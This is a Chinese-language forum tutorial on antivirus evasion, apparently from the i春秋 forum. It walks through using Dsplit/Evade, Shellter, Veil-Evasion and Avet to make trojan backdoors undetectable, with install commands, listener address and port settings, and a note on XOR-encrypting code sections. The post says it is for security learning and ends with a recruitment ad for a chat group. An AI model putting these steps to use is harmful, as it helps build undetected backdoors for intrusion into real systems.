在写这篇文章之前,让我们来了解一下反病毒软件的扫描原理。
反病毒软件主要基于签名技术识别病毒,反病毒软件的扫描程序会扫描特定的字符串,然后与病毒库进行比对,如果比对成功,那么反病毒软件就会报警。
作为一名渗透测试人员或爱好者,木马后门的运用是必不可少的,但是在杀毒软件日趋强大的情况下,普通的木马根本就无法生存。这就催生出了免杀技术。而在免杀与杀毒软件的斗争中,免杀的方法技术也在一步一步改进。常见的免杀手段有特征码修改、内存免杀和对文件的免杀。在这里我就为大家介绍几款免杀效果比较好的免杀工具。
Dsplit和Evade(Github上有,这里不贴地址)
这两款工具都是把可执行文件进行分隔,最终生成很多内容不同的文件。假如您有一个50KB的文件,对文件的前5KB大小的信息进行取样,则可生成10个取样文件。第一个文件只会有文件的前5KB信息,第二个文件则由第一个文件的5KB信息和此后的5KB信息组成。以此类推,所有的文件都包含原文件的前5KB信息。
思路:通过切割工具将我们的目标文件切割成若干后,将尺寸最小的文件丢到https://www.virustoal.com上去检测,去观察这个取样文件是否含有可触发反病毒软件的特征签名?如果没有,就挨个测下去,直到触发,就可以判断在上一个文件的结束地址和这次扫描的文件结束地址之间有匹配了反病毒软件某个签名的特征字符串。接着去修改特定字符串去避开(在不影响程序正常功能的前提下)。这里只是讲述反病毒软件的缺陷,并演示规避他们检测手段的一种方法。
Shellter
Shellter 是一个开源的免杀工具,利用动态Shellcode注入来实现免杀的效果。
我们在kali中输入以下命令去安装Shellter:
apt-getinstall shellter //安装Shellter
whereis shellter
wineshellter.exe //运行Shellter
进入我们炫酷的Shellter界面
下载附件 保存到相册
这里我们选择A(A代表自动模式,PE Target是进行免杀的exe预注入文件路径,程序会被备份到shellter_backup文件夹下,防止原文件被破坏)
后续步骤
L选择攻击载荷
生成成功。
Veil-Evasion
Kali中输入以下命令
切换到Veil-Evasion/setup/目录下运行setup.shcd Veil-Evasion/setup/ ./setup.sh安装有点慢,这里略过。。。
输入list查看该工具所有模块
这里用34模块进行测试
Set LHOST 172.16.2.104
//设置监听机Set LPOST 4444
//设置监听端口Run
//生成免杀后门
注意,需要自己为免杀后门取名或者默认即可,还要为免杀后门选择一种编译方式,这里我们选择免杀效果更好的第2种方式进行编译。
当出现下图时证明木马已经生成,会提示木马所在位置:
实测查杀效果
Avet(BlackHat新工具)
Kali中输入以下命令进行安装
git clone https://github.com/govolution/avet
安装后如果出现报错的问题,编译一下两个.c文件:
cd avet-master
gcc -o make_avet make_avet.c
gcc -o sh_format sh_format.c
安装完成后,找到自己要使用的攻击载荷,切换到/avet/build目录找到相应的.sh文件,对相应的Lhost和Lport进行相应的修改。
用wine安装tdm-gcc(我是在物理机下载后复制过来安装)
wine tdm64-gcc-5.1.0-2.exe
然后再用切换到/avet目录执行./build/相应的载荷,如下图。
生成的.exe文件就在avet文件夹内,默认名称为pwn.exe。
备注:各大免杀工具生成的恶意软件安全期约为一周左右,之后很大可能性被查杀。
最新的无特征免杀法:
何为无特征免杀法?就是脱离传统的定位方法,直接盲免,就对于整体区段进行异或加密,是整体代码发生变换,从而逃脱杀毒软件的查杀,是当今最流行的方法。限于篇幅暂且不提,感兴趣的读者可以自行去了解一下~
注意,文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用
当然了,如果你也想成为一名白帽子,或者对网络安全技术感兴趣,可以关注我,或者加白帽子群(451217067)共同成长~
閱讀更多 i春秋論壇 的文章
